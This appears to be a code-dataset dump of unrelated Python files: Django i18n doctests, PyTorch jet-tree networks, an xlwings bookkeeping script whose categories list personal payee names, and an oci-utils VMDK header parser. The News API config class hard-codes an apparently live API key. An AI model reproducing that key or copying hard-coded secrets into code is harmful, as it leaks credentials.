if sys.version_info >= (2, 5):
tests += """
This test assumes there won't be a Django translation to a US variation
of the Spanish language, a safe assumption. When the user sets it
as the preferred language, the main 'es' translation should be selected
instead.
>>> r.COOKIES = {}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es-us'}
>>> g(r)
'es'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'es-us'}
>>> r.META = {}
>>> g(r)
'es'
"""
tests += """
This tests the following scenario: there isn't a main language (zh)
translation of Django but there is a translation to variation (zh_CN)
the user sets zh-cn as the preferred language, it should be selected by
Django without falling back nor ignoring it.
>>> r.COOKIES = {}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'zh-cn,de'}
>>> g(r)
'zh-cn'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'zh-cn'}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'de'}
>>> g(r)
'zh-cn'
"""
| StarcoderdataPython |
1789136 |
# Prompt for the word to reverse.
word = input("enter a word: ")
# (Dead commented-out iterative implementation removed; it was kept as a
# discarded string literal, which is never a comment in Python.)
def reverse(word, num):
    """Print word[num], word[num-1], ..., word[0] on one line (no newline).

    Called as reverse(word, len(word) - 1) this prints the whole word
    reversed.  The original recursive version sliced the string on every
    call (O(n^2)) and printed inconsistent characters when
    num != len(word) - 1; this iterative version is linear and behaves
    consistently for any valid index.
    """
    for idx in range(num, -1, -1):
        print(word[idx], end="")
# Kick off the reversal from the last character index.
reverse(word, len(word) - 1)
| StarcoderdataPython |
163666 | <reponame>isaachenrion/jets<gh_stars>1-10
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..utils import AnyBatchGRUCell
from ..utils import BiDirectionalTreeGRU
class GRNNTransformSimple(nn.Module):
    """Recursive NN over binary jet trees: embeds each node bottom-up by
    combining the embeddings of its two children with its own features,
    and returns the root embedding per jet."""
    def __init__(self, features=None, hidden=None,**kwargs):
        super().__init__()
        activation_string = 'relu'
        self.activation = getattr(F, activation_string)
        # fc_u: lifts raw node features; fc_h: merges (left, right, self).
        self.fc_u = nn.Linear(features, hidden)
        self.fc_h = nn.Linear(3 * hidden, hidden)
        gain = nn.init.calculate_gain(activation_string)
        # NOTE(review): nn.init.xavier_uniform / orthogonal (no trailing
        # underscore) are deprecated aliases in modern PyTorch -- confirm
        # the targeted torch version before renaming.
        nn.init.xavier_uniform(self.fc_u.weight, gain=gain)
        nn.init.orthogonal(self.fc_h.weight, gain=gain)
    def forward(self, jets, **kwargs):
        """Process a batched-tree tuple (levels, children, n_inners, contents,
        n_jets) level by level, deepest first, and return a (n_jets, hidden)
        tensor of root embeddings."""
        #n_jets = len(jets)
        #levels, children, n_inners, contents = batch(jets)
        levels, children, n_inners, contents, n_jets = jets
        #n_jets = len(contents)
        n_levels = len(levels)
        embeddings = []
        # Iterate levels from the deepest up to the root.
        for i, nodes in enumerate(levels[::-1]):
            j = n_levels - 1 - i
            # Nodes are ordered inner-first at each level; empty slices on
            # old torch versions raised ValueError, hence the guards.
            try:
                inner = nodes[:n_inners[j]]
            except ValueError:
                inner = []
            try:
                outer = nodes[n_inners[j]:]
            except ValueError:
                outer = []
            u_k = self.fc_u(contents[j])
            u_k = self.activation(u_k)
            if len(inner) > 0:
                zero = torch.zeros(1).long(); one = torch.ones(1).long()
                if torch.cuda.is_available(): zero = zero.cuda(); one = one.cuda()
                # Gather child embeddings from the previously computed level.
                h_L = embeddings[-1][children[inner, zero]]
                h_R = embeddings[-1][children[inner, one]]
                h = torch.cat((h_L, h_R, u_k[:n_inners[j]]), 1)
                h = self.fc_h(h)
                h = self.activation(h)
                # Leaves at this level keep their plain feature embedding.
                try:
                    embeddings.append(torch.cat((h, u_k[n_inners[j]:]), 0))
                except ValueError:
                    embeddings.append(h)
            else:
                embeddings.append(u_k)
        return embeddings[-1].view((n_jets, -1))
class GRNNTransformGated(nn.Module):
    """Gated variant of the recursive jet-tree embedding: at every inner node
    a GRU-style reset gate and a 4-way softmax mixing gate blend the new
    hidden state with the left child, right child, and local features."""
    def __init__(self, features=None, hidden=None, iters=0, **kwargs):
        super().__init__()
        self.hidden = hidden
        self.iters = iters
        activation_string = 'relu' if iters == 0 else 'tanh'
        self.activation = getattr(F, activation_string)
        # fc_u: feature lift; fc_h: candidate state; fc_z/fc_r: gates.
        self.fc_u = nn.Linear(features, hidden)
        self.fc_h = nn.Linear(3 * hidden, hidden)
        self.fc_z = nn.Linear(4 * hidden, 4 * hidden)
        self.fc_r = nn.Linear(3 * hidden, 3 * hidden)
        gain = nn.init.calculate_gain(activation_string)
        # NOTE(review): non-underscore init functions are deprecated aliases
        # in modern PyTorch.
        nn.init.xavier_uniform(self.fc_u.weight, gain=gain)
        nn.init.orthogonal(self.fc_h.weight, gain=gain)
        nn.init.xavier_uniform(self.fc_z.weight, gain=gain)
        nn.init.xavier_uniform(self.fc_r.weight, gain=gain)
        if self.iters > 0:
            # Downward pass modules (currently unused by forward -- see below).
            self.down_root = nn.Linear(hidden, hidden)
            self.down_gru = AnyBatchGRUCell(hidden, hidden)
    def forward(self, jets, return_states=False, **kwargs):
        """Return a (n_jets, hidden) tensor of root embeddings for the
        batched-tree tuple (levels, children, n_inners, contents, n_jets)."""
        #n_jets = len(conte)
        levels, children, n_inners, contents, n_jets = jets
        #n_jets = len(contents)
        #parents= batch_parents(jets)
        up_embeddings = [None for _ in range(len(levels))]
        down_embeddings = [None for _ in range(len(levels))]
        self.recursive_embedding(up_embeddings, levels, children, n_inners, contents)
        # NOTE(review): the else branch (concatenating the downward pass) is
        # dead code -- `if True` always takes the first branch, and
        # down_embeddings is never filled. Presumably a disabled experiment.
        if True:# or self.iters == 0:
            return up_embeddings[0].view((n_jets, -1))
        else:
            return torch.cat(
                (
                    up_embeddings[0].view((n_jets, -1)),
                    down_embeddings[0].view((n_jets, -1))
                ),
                1)
    def recursive_embedding(self, up_embeddings, levels, children, n_inners, contents):
        """Fill up_embeddings[j] for every level j, deepest level first."""
        n_levels = len(levels)
        hidden = self.hidden
        for i, nodes in enumerate(levels[::-1]):
            j = n_levels - 1 - i
            # Inner nodes come first at each level; guards mirror the
            # Simple variant's handling of empty slices.
            try:
                inner = nodes[:n_inners[j]]
            except ValueError:
                inner = []
            try:
                outer = nodes[n_inners[j]:]
            except ValueError:
                outer = []
            u_k = self.fc_u(contents[j])
            u_k = self.activation(u_k)
            if len(inner) > 0:
                try:
                    u_k_inners = u_k[:n_inners[j]]
                except ValueError:
                    u_k_inners = []
                try:
                    u_k_leaves = u_k[n_inners[j]:]
                except ValueError:
                    u_k_leaves = []
                zero = torch.zeros(1).long(); one = torch.ones(1).long()
                if torch.cuda.is_available(): zero = zero.cuda(); one = one.cuda()
                h_L = up_embeddings[j+1][children[inner, zero]]
                h_R = up_embeddings[j+1][children[inner, one]]
                hhu = torch.cat((h_L, h_R, u_k_inners), 1)
                # Reset gate over (left, right, local), then candidate state.
                # NOTE(review): F.sigmoid / F.softmax-without-dim are
                # deprecated in modern PyTorch.
                r = self.fc_r(hhu)
                r = F.sigmoid(r)
                h_H = self.fc_h(r * hhu)
                h_H = self.activation(h_H)
                z = self.fc_z(torch.cat((h_H, hhu), -1))
                z_H = z[:, :hidden] # new activation
                z_L = z[:, hidden:2*hidden] # left activation
                z_R = z[:, 2*hidden:3*hidden] # right activation
                z_N = z[:, 3*hidden:] # local state
                z = torch.stack([z_H,z_L,z_R,z_N], 2)
                z = F.softmax(z)
                # Convex mix of candidate, children, and local features.
                h = ((z[:, :, 0] * h_H) +
                     (z[:, :, 1] * h_L) +
                     (z[:, :, 2] * h_R) +
                     (z[:, :, 3] * u_k_inners))
                # NOTE(review): the Simple variant catches ValueError here;
                # AttributeError looks inconsistent -- confirm which exception
                # torch.cat raises for the empty-leaves case on the targeted
                # torch version.
                try:
                    up_embeddings[j] = torch.cat((h, u_k_leaves), 0)
                except AttributeError:
                    up_embeddings[j] = h
            else:
                up_embeddings[j] = u_k
60451 | <filename>quokka/utils/custom_vars.py
# coding: utf-8
from dynaconf.utils.parse_conf import parse_conf_data
def parse_data(data):
    """Return converted data from @int, @float, @bool, @json markers"""
    # Thin wrapper over dynaconf's parser so callers don't depend on dynaconf.
    return parse_conf_data(data)
def custom_var_dict(cvarlist):
    """Map each custom var's 'key' to its parsed 'value'.

    Accepts None (treated as an empty list); later duplicates of a key
    overwrite earlier ones.
    """
    result = {}
    for cvar in (cvarlist or []):
        result[cvar['key']] = parse_data(cvar['value'])
    return result
| StarcoderdataPython |
166025 | <reponame>vreon/figment<gh_stars>10-100
from figment import Component
class Important(Component):
    """An item that can't be dropped or taken.

    Pure marker component: it defines no behaviour of its own --
    presumably other systems check for its presence (TODO confirm).
    """
class Config:
    '''
    General configuration parent class
    '''
    # News API URL templates; fill with .format(category_or_source, api_key).
    NEWS_SOURCES_BASE_URL = 'https://newsapi.org/v2/sources?category={}&apiKey={}'
    NEWS_NEWS_API_BASE_URL = 'https://newsapi.org/v2/everything?language=en&sources={}&apiKey={}'
    # (removed a redundant trailing `pass` -- the class body is non-empty)
class ProdConfig(Config):
    '''
    Production configuration child class

    Args:
        Config: The parent configuration class with General configuration settings
    '''
    # SECURITY: a live API key is hard-coded in source control; it should be
    # loaded from an environment variable or a secrets store instead.
    NEWS_API_KEY = 'f64a31e5dca5460ab7e3f34713eb9670'
    # (removed a redundant trailing `pass` -- the class body is non-empty)
class DevConfig(Config):
    '''
    Development configuration child class

    Args:
        Config: The parent configuration class with General configuration settings
    '''
    # Enable debug mode for development.
    DEBUG = True
3385935 | # -*- coding:utf-8 -*-
# --------------------------------------------------------
# Copyright (C), 2016-2021, lizhe, All rights reserved
# --------------------------------------------------------
# @Name: my_money.py
# @Author: lizhe
# @Created: 2021/9/14 - 22:12
# --------------------------------------------------------
import xlwings as xw
from abc import ABCMeta, abstractmethod
from typing import List, Dict
from automotive import Utils
# Transaction-type labels used as dict keys and worksheet names
# ("支出" = expense/outcome, "收入" = income).
outcome = "支出"
income = "收入"
categories = {
'购物消费': {
'衣裤鞋帽': ["领跑体育用品", "亚麻拖鞋", "优衣库"],
'洗护用品': [],
'厨房用品': ["佳帮手"],
'家用纺织': [],
'清洁用品': [],
'家居日用': ["宜家家居", "厨房下水道", "佛山照明t5", "防滑垫", "外科口罩", "冰箱贴磁贴", "冰箱磁性贴", "香榭手机维修"],
'家具家电': [],
'汽车用品': [],
'电子数码': ["小米之家", "罗马仕", "保护套", "腕带", "佳申驰通讯", "乾元宝融", "小米店", "小米科技"],
'美妆护肤': [],
'书报杂志': [],
'眼镜': []},
'食品酒水': {
'早餐': ["禾央汤包", "全家购物", "安德鲁森", "泸州小笼包", "麦的多", "麦包点", "周小霞", "红旗连锁订单-262267876806093", "勇",
"红旗连锁订单-262267874206093", "四川善禅农业科技有限公司"],
'中餐': ["阿蠔海鲜焖面", "卢婆婆姜鸭面", "顺旺基", "荟福源", "宜宾燃面", "享米时", "老麻抄手", "西北面点王",
"袁记云饺", "籣州牛肉面", "成都鸡汤抄手", "大巴山猪脚饭", "卤鹅饭", "e特黄焖鸡瓦香鸡成都店",
"杨铭宇黄焖鸡米饭", "八二小区干海椒抄手", "晓武林烤鸭", "乡村基", "戊丰记卤肉饭", "沙县小吃成都银泰城店",
"喜水饺", "兵哥豌豆面", "福记羊肉米粉", "岭南牛杂", "自小田", "搪瓷盌小面成都伏龙北巷", "蚝门圣焱", "本味简餐厅",
"粤饺皇", "南城香冒烤鸭卤肉饭", "贰柒拾乐山干绍面", "拾小馆", "陕西面馆", "干辣椒抄手", "豆汤饭", "快餐店",
"姜鸭面", "北方水饺", "匡胖子面馆", "余肥肠", "蜀人卤匠乌鸡米线", "张氏海味面", "担担面", "蒌兰兰州牛肉面"],
'晚餐': ["庆元猪脚饭"],
'零食': ["面包新语(银泰城店)", "雪糕批发", "一同零食", "商户_李黎明", "红旗连锁订单-261927364406093"],
'水果': ["水果", "芭芭农场"],
'超市购物': ["成都市北城天街店", "成都荆竹中路店", "麦德龙", "欧尚成都市高新店", "谊品生鲜", "高新店", "成都盒马",
"成都中营贸易", "招商雍华府店", "万家V+南区", "银犁冷藏", "金牛店", "恒旺超市", "支付宝签购单,永辉(成都市银泰城店)"],
'烟酒茶': [],
'外出美食': ["金翠河烧鹅餐厅", "马帮冒菜", "实惠啤酒鸭", "麦当劳", "食其家", "正反面", "青羊区东方宫牛肉拉面店", "成都港九餐饮",
"八二私房水饺", "鱼吖吖(武侯店)", "口味鲜面庄", "叶抄手", "雷四孃小吃", "朱记蛙三", "火舞凉山西昌原生烧烤",
"万州烤鱼", "肯德基", "巴山豆花饭成都", "卡萨马可", "老北京炸酱面", "禾木烤肉", "峨眉山周记烧烤", "青年火锅店",
"茵赫餐饮管理", "汉堡王", "热恋冰淇淋", "初壹饺子", "点都德", "跷脚牛肉", "外卖订单", "蔡锅盔", "潮汕牛肉", "印度菜菜",
"韩吉烤肉", "小川王饭店", "传统杂酱面", "烤肉", "蓉辉川菜", "菜鸟烧菜", "老马家资格烤羊排", "正禾鲜", "港仔老友记", "漫山洋芋",
"好功夫煲仔饭", "林妹妹饺子馆", "辣妈串串香", "醉鹃城市井火锅", "口口香饭店"],
'粮油米面': [],
'米': [],
'面': ["谢孝元", "高筋鲜面"],
'肉类': ["金忠食品", "邓哥鱼铺", "龙仕林", "成都泥厨子大食堂", "章相山", "ZXS", "黑龙滩生态鱼铺", "谢氏冷鲜店", "良波", "龙哥鲜肉铺", "顾老四乡村土鸡", "高金食品"],
'香料': ["林叔干杂铺"],
'饮料': ["书亦烧仙草", "星巴克", "书亦燒仙草", "Mii Coffee", "茶百道", "瑞幸咖啡", "GREYBOX COFFEE", "可口可乐", "红旗连锁订单-262538119309061",
"红旗连锁订单-262903487208224",
"日记咖啡馆", "丸摩堂", "怡宝纯净水", "长虹科技大厦二店", "君茂副食", "天然水", "不要对我尖叫", "0708玉泉街分店", "航空路中心店", "奈雪の茶",
"红旗连锁订单-261927353606093", "红旗连锁订单-262478899806093", "红旗连锁订单-262459446909458"],
'调料': ["花生碎"],
'蔬菜': ["登梅", "雪梅", "思忠", "*琴", "兰兰姐", "*再泉", "春儿", "蔡德文", "沈德全", "小兰蔬菜店",
"玲利", "邓花椒", "郑淑秀", "正宏", "蔬菜", "沈哥菜摊", "*青", "绿叶", "廖礼华"],
'蛋类': [],
'奶制品': [],
'宵夜': [],
'食用油': [],
'外购凉菜': ["唐家臻记", "紫燕百味鸡", "敖锦记烫油鹅", "掌柜土鸡片", "乐山甜皮鸭"],
'调味品': [],
'速冻食品': [],
'买菜': [],
'饮料牛奶': []
},
'居家生活': {
'清洁衣物': [],
'水费': [],
'电费': ["电费"],
'燃气费': ["燃气费"],
'物管费': ["重庆华宇", "物业管理费"],
'维修费': [],
'房屋清洁': [],
'理发': ["丽发堂"]
},
'行车交通': {
'加油': ["壳牌", "中石化", "中油", "加好油", "中国石油"],
'停车': ["无感支付", "停车场", "瑞林", "中青旅山", "停车费"],
'保养': [],
'维修': [],
'违章罚款': [],
'保险': [],
'公交': [],
'地铁': ["成都地铁运营有限公司", "轨道交通", "成都地铁", "天府通", "公共交通"],
'打车': ["滴滴快车", "高德地图打车"],
'租车': [],
'火车': ["火车票"],
'飞机': [],
'驾照': [],
'自行车': ["哈啰"],
'过路费': [],
'洗车': ["德系名车专修"],
'大巴': []
},
'交流通讯': {
'手机费': ["中国移动", "中国电信"],
'邮寄费': []
},
'休闲娱乐': {
'电影': [],
'宠物': ["鸡胸肉鲜", "猫", "伍德氏", "激光笔", "瑞爱康宠物医院", "猫砂", "宠物", "红旗连锁订单-261948554408349"],
'其他娱乐': [],
'花鸟虫鱼': []
},
'人情费用': {
'请客': [],
'孝敬父母': ["崔丽"],
'红包': ["支付宝红包"],
'其他人情': []
},
'公司出差': {
'交通费': [],
'住宿费': [],
'餐饮费': [],
'其他消费': []
},
'金融保险': {
'汽车首付': [],
'投资亏损': [],
'车贷': [],
'按揭还款': [],
'车贷手续': [],
'房贷': [],
'人身保险': ["众安在线", "相互宝", "保险"],
'医疗保险': []
},
'医疗教育': {
'门诊药品': [],
'住院费': [],
'体检': []
},
'装修费用': {
'装修材料': [],
'家电家具': [],
'装修装饰': [],
'装修人工': [],
'装修其他': []
},
'其他杂项': {
'意外丢失': [],
'烂账损失': [],
'其他支出': ["爱心捐赠"]
},
'旅游消费': {
'住宿': ["102702238409", "马耀龙"],
'证件': [],
'餐饮': ["伊香阁餐厅", "郑立峰", "依然風流", "曾凡政", "新俊商店", "*金梅", "马奴海", "*君平", "赫伊尔牛肉面", "顺姐", "照林", "朱之胜",
"泉记濑粉皇", "惠福东路分店", "陶陶居", "莲香楼", "潘瑞枝", "蔡澜抱抱", "广州盒马", "瓒记美食", "饵果生活超市", "陈在喜", "罗意安", "军校精品"],
'交通': ["广州地铁", "广州羊城通", "华住酒店订单5102201210517231523139006X05R9DH", "去哪儿网"],
'购物': ["格尔木梦幻盐湖", "大柴旦晶晶综合超市", "武威服务区", "西广场店", "建军"],
'旅游其他': []
}
}
def contain_keyword(keywords: list, pay_detail: str) -> bool:
    """Return True if any of *keywords* occurs as a substring of *pay_detail*."""
    # any() with a generator replaces the manual loop-and-return idiom.
    return any(keyword in pay_detail for keyword in keywords)
class TemplateExcel(object):
    """One row of the bookkeeping template spreadsheet.

    Every field defaults to the empty string and mirrors a spreadsheet
    column: transaction type, date, category, sub-category, the two
    accounts, amount, member, seller, project and a free-form comment.
    """

    def __init__(self):
        # Column order matters: __str__ and the writer rely on the
        # attribute insertion order below.
        self.exchange_type = ""   # 交易类型
        self.date = ""            # 日期
        self.category = ""        # 分类
        self.sub_category = ""    # 子分类
        self.account1 = ""        # 账户1
        self.account2 = ""        # 账户2
        self.amount = ""          # 金额
        self.member = ""          # 成员
        self.seller = ""          # 商家
        self.project = ""         # 项目
        self.comment = ""         # 备注

    def __str__(self):
        """Render all fields as ' name = [value]' fragments, concatenated."""
        fragments = [f" {name} = [{value}]" for name, value in self.__dict__.items()]
        return "".join(fragments)
class AbsOps(metaclass=ABCMeta):
    """Abstract base for bill-statement readers: subclasses parse a bank/app
    export into TemplateExcel rows; write() dumps them into the template
    workbook via xlwings."""
    def __init__(self):
        # Utility helper (timestamps etc.) from the automotive package.
        self._utils = Utils()
    @abstractmethod
    def read(self, file: str) -> Dict[str, List[TemplateExcel]]:
        """Parse *file* and return rows grouped by the module-level
        outcome/income keys."""
        pass
    def write(self, date_dict: Dict[str, List[TemplateExcel]], file: str = "template.xls"):
        """Write parsed rows into the income/outcome sheets of *file* and
        save a timestamped copy (result_<timestamp>.xls)."""
        app = xw.App(visible=True, add_book=False)
        wb = app.books.open(file)
        out_list = date_dict[outcome]
        # Income rows are optional in the parsed dict.
        try:
            in_list = date_dict[income]
        except KeyError:
            in_list = []
        # Sheets are named after the Chinese income/outcome constants.
        in_sheet = wb.sheets[income]
        out_sheet = wb.sheets[outcome]
        # Assigning a list of tuples to A2 fills the range row by row.
        in_sheet.range("A2").value = self.__convert_contents(in_list)
        out_sheet.range("A2").value = self.__convert_contents(out_list)
        wb.save(f"result_{self._utils.get_time_as_string()}.xls")
        wb.close()
        app.quit()
    @staticmethod
    def __convert_contents(templates: List[TemplateExcel]) -> List:
        """Flatten TemplateExcel objects into tuples in spreadsheet column
        order (one tuple per row)."""
        contents = []
        if len(templates) > 0:
            for template in templates:
                contents.append((
                    template.exchange_type,
                    template.date,
                    template.category,
                    template.sub_category,
                    template.account1,
                    template.account2,
                    template.amount,
                    template.member,
                    template.seller,
                    template.project,
                    template.comment
                ))
        return contents
def read_file(file: str, encoding: str = "utf-8") -> list:
    """Read a text file and return its lines (newline characters kept)."""
    with open(file, "r", encoding=encoding) as handle:
        return list(handle)
| StarcoderdataPython |
1783890 | <filename>lib/oci_utils/migrate/image_types/vmdk.py
# oci-utils
#
# Copyright (c) 2019, 2021 Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown
# at http://oss.oracle.com/licenses/upl.
"""
Module to handle VMDK formatted virtual disk images.
"""
import logging
import os
import re
import struct
from oci_utils.migrate import migrate_data
from oci_utils.migrate import read_yn
from oci_utils.migrate import result_msg
from oci_utils.migrate.exception import OciMigrateException
from oci_utils.migrate.imgdevice import DeviceData
from oci_utils.migrate.migrate_data import gigabyte
"""
typedef uint64 SectorType;
typedef uint8 Bool;
typedef struct SparseExtentHeader {
uint32 magicNumber;
uint32 version;
uint32 flags;
SectorType capacity;
SectorType grainSize;
SectorType descriptorOffset;
SectorType descriptorSize;
uint32 numGTEsPerGT;
SectorType rgdOffset;
SectorType gdOffset;
SectorType overHead;
Bool uncleanShutdown;
char singleEndLineChar;
char nonEndLineChar;
char doubleEndLineChar1;
char doubleEndLineChar2;
uint16 compressAlgorithm;
uint8 pad[433];
} SparseExtentHeader
"""
# Registry entry keyed by the image magic number (hex '4b444d56' is the
# ASCII bytes 'KDMV' -- presumably the VMDK sparse-extent magic; confirm
# against the dispatcher that consumes format_data). Maps to the handler
# module/class and the migration prerequisites.
format_data = {'4b444d56': {'name': 'vmdk',
                            'module': 'vmdk',
                            'clazz': 'VmdkHead',
                            'prereq': {'MAX_IMG_SIZE_GB': 400.0,
                                       'vmdk_supported_types': ['monolithicSparse', 'streamOptimized']}}}
# Module-level logger following the oci-utils naming convention.
_logger = logging.getLogger('oci-utils.vmdk')
class VmdkHead(DeviceData):
    """
    Class to analyse header of vmdk image file.

    Attributes
    ----------
        filename: str
            The full path of the vmdk image file.
        stat: tuple
            The image file stat data.
        img_tag: str
            The bare file name.
        vmdkhead_dict: dict
            The VMDK file header as a dictionary.
        vmdkdesc_dict: dict
            The VMDK file description as a dictionary.
    """
    #
    # struct format characters for the sparse extent header fields.
    Bool = '?'
    char = 'B' # 1 byte char
    uint8 = 'B' # 1 byte unsigned int
    uint16 = 'H' # 16bit unsigned int
    uint32 = 'I' # 32bit unsigned int
    uint64 = 'Q' # 64bit unsigned long
    SectorType = 'Q' # 64bit unsigned long
    string = 's' # string
    #
    # vmdk header0 definition:
    # NOTE(review): the last element multiplies the 3-item list by 433,
    # producing one flat list whose first element is a single 'B' -- so the
    # unpack format contains only one pad byte, not 433. All fields of
    # interest precede the padding, so parsing is self-consistent; left
    # unchanged deliberately (fixing it would also create 433 duplicate
    # 'pad' keys in vmdkhead_dict).
    header0_structure = [[uint32, '%#x', 'magic'],
                         [uint32, '%d', 'version'],
                         [uint32, '%#x', 'flags'],
                         [SectorType, '%d', 'capacity'],
                         [SectorType, '%d', 'grainSize'],
                         [SectorType, '%d', 'descriptorOffset'],
                         [SectorType, '%d', 'descriptorSize'],
                         [uint32, '%d', 'numGTEsPerGT'],
                         [SectorType, '%d', 'rgdOffset'],
                         [SectorType, '%d', 'gdOffset'],
                         [SectorType, '%d', 'overHead'],
                         [Bool, '%#x', 'uncleanShutdown'],
                         [char, '%#x', 'singleEndLineChar'],
                         [char, '%#x', 'nonEndLineChar'],
                         [char, '%#x', 'doubleEndLineChar1'],
                         [char, '%#x', 'doubleEndLineChar2'],
                         [uint16, '%s', 'compressAlgorithm'],
                         [uint8, '%#x', 'pad'] * 433]
    #
    # struct format string (little-endian, no alignment)
    vmdkhead_fmt = '<' + ''.join(f[0] for f in header0_structure)
    head_size = struct.calcsize(vmdkhead_fmt)
    _logger = logging.getLogger('oci-utils.vmdk')
    streamoptimized_msg = '\n  Although streamOptimized is a supported format, ' \
                          'issues might arise during or after mounting the ' \
                          'image file. It is advised\n  to convert the image ' \
                          'file to monolithicSparse by running ' \
                          '[qemu-img convert -O vmdk thisimage.vmdk newimage.vmdk]\n'

    def __init__(self, filename):
        """
        Initialisation of the vmdk header analysis.

        Parameters
        ----------
        filename: str
            Full path of the vmdk image file.
        """
        super().__init__(filename)
        _logger.debug('VMDK header size: %d bytes', self.head_size)
        try:
            with open(self._fn, 'rb') as f:
                head_bin = f.read(self.head_size)
                _logger.debug('%s header successfully read', self._fn)
        except Exception as e:
            _logger.critical('   Failed to read header of %s: %s', self._fn, str(e))
            # BUGFIX: the format string has two placeholders; the original
            # passed only self._fn, raising TypeError instead of the intended
            # OciMigrateException.
            raise OciMigrateException('Failed to read the header of %s: %s'
                                      % (self._fn, str(e))) from e
        vmdkheader = struct.unpack(VmdkHead.vmdkhead_fmt, head_bin)
        try:
            with open(self._fn, 'rb') as f:
                # The embedded text descriptor lives at offset 512; keep only
                # 'key=value' lines.
                f.seek(512)
                head_descr = [it for
                              it in f.read(1024).decode('utf-8').splitlines()
                              if '=' in it]
        except Exception as e:
            _logger.critical('   Failed to read description of %s: %s', self._fn, str(e))
            # BUGFIX: same two-placeholder/one-argument mismatch as above.
            raise OciMigrateException('Failed to read the description of %s: %s'
                                      % (self._fn, str(e))) from e
        self.stat = os.stat(self._fn)
        self.img_tag = os.path.splitext(os.path.split(self._fn)[1])[0]
        self.vmdkhead_dict = dict((name[2], vmdkheader[i]) for i, name in
                                  enumerate(VmdkHead.header0_structure))
        self.vmdkdesc_dict = dict(
            [re.sub(r'"', '', kv).split('=') for kv in head_descr])
        self.img_header = dict()
        self.img_header['head'] = self.vmdkhead_dict
        self.img_header['desc'] = self.vmdkdesc_dict
        result_msg(msg='Got image %s header' % filename, result=False)

    def show_header(self):
        """
        Lists the header contents formatted.

        Returns
        -------
            No return value.
        """
        result_msg(msg='\n  %30s\n  %30s   %30s' % ('VMDK file header data', '-' * 30, '-' * 30), result=False)
        for f in VmdkHead.header0_structure:
            result_msg(msg=''.join(['  %30s : ' % f[2], f[1] % self.vmdkhead_dict[f[2]]]), result=False)
        result_msg(msg='\n  %30s\n  %30s   %30s' % ('VMDK file descriptor data', '-' * 30, '-' * 30), result=False)
        for k in sorted(self.vmdkdesc_dict):
            result_msg(msg='  %30s : %-30s' % (k, self.vmdkdesc_dict[k]), result=False)

    def image_size(self):
        """
        Get the size of the image file.

        Returns
        -------
            dict:
                physical file size, logical file size
        """
        # capacity is expressed in 512-byte sectors.
        img_sz = {'physical': float(self.stat.st_size)/gigabyte,
                  'logical': float(self.vmdkhead_dict['capacity']*512)/gigabyte}
        result_msg(
            msg='Image size: physical %10.2f GB, logical %10.2f GB'
                % (img_sz['physical'], img_sz['logical']),
            result=True)
        return img_sz

    def image_supported(self, image_defs):
        """
        Verifies if the image file is supported for migration to the Oracle
        cloud infrastructure.

        Parameters
        ----------
        image_defs: dict
            The predefined data and prerequisits for this type of image.

        Returns
        -------
            bool: True on success, False otherwise.
            str: Eventual message on success or failure.
        """
        _logger.debug('__ Image support.')
        supp = True
        prerequisites = image_defs['prereq']
        msg = ''
        if self.vmdkdesc_dict['createType'] \
                in prerequisites['vmdk_supported_types']:
            msg += 'Type is %s, OK.\n' % self.vmdkdesc_dict['createType']
        else:
            msg += 'Type %s is not supported.\n' % \
                   self.vmdkdesc_dict['createType']
            supp = False
        sizes = self.image_size()
        if sizes['logical'] > prerequisites['MAX_IMG_SIZE_GB']:
            msg += 'Size of the image %.2f GB exceeds the maximum allowed ' \
                   'size of %.2f GB.\n' % \
                   (sizes['logical'], prerequisites['MAX_IMG_SIZE_GB'])
            supp = False
        else:
            msg += 'Image size of %.2f GB below maximum allowed size ' \
                   'of %.2f GB, OK.\n' % \
                   (sizes['logical'], prerequisites['MAX_IMG_SIZE_GB'])
        return supp, msg

    def image_data(self):
        """
        Collect data about contents of the image file.

        Returns
        -------
            bool: True on success, False otherwise;
            dict: The image data.
        """
        _logger.debug('Image data: %s', self._fn)
        #
        # initialise the dictionary for the image data
        self.image_info['img_name'] = self._fn
        self.image_info['img_type'] = 'VMDK'
        self.image_info['img_header'] = self.img_header
        self.image_info['img_size'] = self.image_size()
        #
        # mount the image using the nbd
        try:
            result = self.handle_image()
        except Exception as e:
            _logger.critical('   Error %s', str(e))
            raise OciMigrateException('Failed') from e
        return result, self.image_info

    def type_specific_prereq_test(self):
        """
        Verify the prerequisites specific for the image type from the header.

        Returns
        -------
            bool: True or False.
            str : Message
        """
        _logger.debug('__ Specific prerequisites.')
        prereqs = format_data['4b444d56']['prereq']
        failmsg = ''
        #
        # size
        passed_requirement = True
        if self.image_info['img_size']['logical'] > prereqs['MAX_IMG_SIZE_GB']:
            # BUGFIX: the actual image size and the maximum were passed in the
            # wrong order (the success branch below shows the intended order).
            _logger.critical('   Image size %8.2f GB exceeds maximum allowed %8.2f GB',
                             self.image_info['img_size']['logical'],
                             prereqs['MAX_IMG_SIZE_GB'])
            failmsg += '\n  Image size %8.2f GB exceeds maximum allowed ' \
                       '%8.2f GB' % (self.image_info['img_size']['logical'],
                                     prereqs['MAX_IMG_SIZE_GB'])
            passed_requirement = False
        else:
            failmsg += '\n  Image size %8.2f GB meets maximum allowed size ' \
                       'of %8.2f GB' % (self.image_info['img_size']['logical'],
                                        prereqs['MAX_IMG_SIZE_GB'])
        #
        # type
        if self.img_header['desc']['createType'] \
                not in prereqs['vmdk_supported_types']:
            _logger.critical('   Image type %s is not in the supported type list: %s',
                             self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
            failmsg += '\n  Image type %s is not in the supported type list: %s' \
                       % (self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
            passed_requirement = False
        else:
            failmsg += '\n  Image type %s is in the supported type list: %s' \
                       % (self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
        #
        # Warning, for now, streamOptimized format will probably cause problems.
        if self.img_header['desc']['createType'] == 'streamOptimized':
            _ = read_yn('  %s\n  Continue' % self.streamoptimized_msg, yn=False, suppose_yes=migrate_data.yes_flag)
        return passed_requirement, failmsg
| StarcoderdataPython |
3378276 | <filename>pagetags/urls.py
# -*- coding: utf-8 -*-
"""
URL dispatcher config for Pagetags Django CMS plugin.
"""
from django.conf.urls import patterns, include, url
from pagetags import views
